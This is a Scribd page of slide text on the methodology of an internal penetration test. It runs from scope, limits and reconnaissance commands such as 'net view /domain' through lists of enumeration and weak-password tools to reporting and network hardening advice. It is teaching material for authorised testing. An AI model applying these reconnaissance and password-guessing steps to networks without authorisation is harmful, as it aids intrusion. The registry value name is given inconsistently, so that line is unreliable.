Scribd
Upload
51 views

Internal Penetration Testing

This document outlines the process and tools used for internal penetration testing. It discusses defining the scope and goals, appropriate limits, and differences between internal and external testing. The main steps include footprint analysis, host identification, service identification and enumeration, network mapping, and vulnerability scanning. High severity vulnerabilities like weak NetBIOS passwords and SQL injections are priorities. Findings should be reported clearly with categorizations and remediation recommendations.

Uploaded by

Saroja Roja
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
51 views

Internal Penetration Testing

This document outlines the process and tools used for internal penetration testing. It discusses defining the scope and goals, appropriate limits, and differences between internal and external testing. The main steps include footprint analysis, host identification, service identification and enumeration, network mapping, and vulnerability scanning. High severity vulnerabilities like weak NetBIOS passwords and SQL injections are priorities. Findings should be reported clearly with categorizations and remediation recommendations.

Uploaded by

Saroja Roja
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 22

Internal Penetration Testing

Internal Penetration Testing


Defining

scope and goals


Tools of the Test
Presentation of findings

Defining Scope and Goals


Define

specific goals for assessment

What defines success?


Identify vs. exploit?
Should systems be tagged?
Are screenshots enough?

Create

timelines
Active assessment

Limits
Out of scope? Not for hackers
Reading email in attempt to gain passwords
Attacking workstations to gain network
credentials
Attacking administrative workstations to gain
admin access
Searching .txt and .doc files on workstations
Searching .txt and .doc files on production
systems
Sniffing traffic
Keystroke loggers
Intentional denial of service

Internal vs. External


What is the difference?
less or no access controls
test systems
trust relationships

Tools of the Test


1.
2.
3.

4.
5.
6.
7.
8.

Footprint
Host Identification
Service Identification
Service Enumeration
Host Enumeration
Network Map
HSV Scans
Vulnerability Mapping/Exploitation

1. Footprint
Goal:

identify ranges and domains

net view /domain to identify domains

Footprint
Identify IP ranges
SNMP
DNS
ICMP

2. Host Identification
Identify Hosts
TCP

ICMP

Identify domain members using the NET


command
net view /domain:<domain>

Host Identification
Foundstone

net view

3. Service Identification
Identify Ports

TCP
UDP

Tool:
Fscan i <ip>

4. Service Enumeration

Identify what is running on listening ports

Tool:
Nmap & Nessus

5. Host Enumeration
use all the previous information to make
accurate guess at OS and version from
Nessus reports

6. Network Map
Should be created to identify hosts, services
and access paths.

7. HSV Scans
High Severity Vulnerability (HSV) Scans
should be performed to identify systems
with high severity vulnerability
NetBIOS

weak passwords
SQL weak passwords
Web Vulnerabilities

Cont.
NetBIOS weak passwords
manual guessing techniques
nbtenum ntsleuth.0catch.com
nat Network Auditing Tool

SQL weak passwords


Tools
SQLMAP
SQLlhf
SQLdict
Sqlping2
osql

Remarks
SQL can run on alternate ports

Web vulnerabilities
stealth
whisker
typhon

8. Vulnerability Mapping/Exploitation
Source port attacks
If you use IPSec dont forget to use the
NoDefaultExempt key
HKLM\SYSTEM\CCS\Services\IPSEC\NoDefaultExec | DWORD = 1

Web Attacks
NetBIOS

SQL Attacks

9. Presentation of findings
Report should be clear and concise
Include screenshots
Use action items for remediation
Categorize findings
TACTICAL
STRATEGIC

Presentation of findings
Strengthening Microsoft Networks
strong domain architectures
rigid user management
hardened applications
principle of least privilege
security baselines for systems
defence in depth
network segmentation
3rd party audit

THANK YOU

You might also like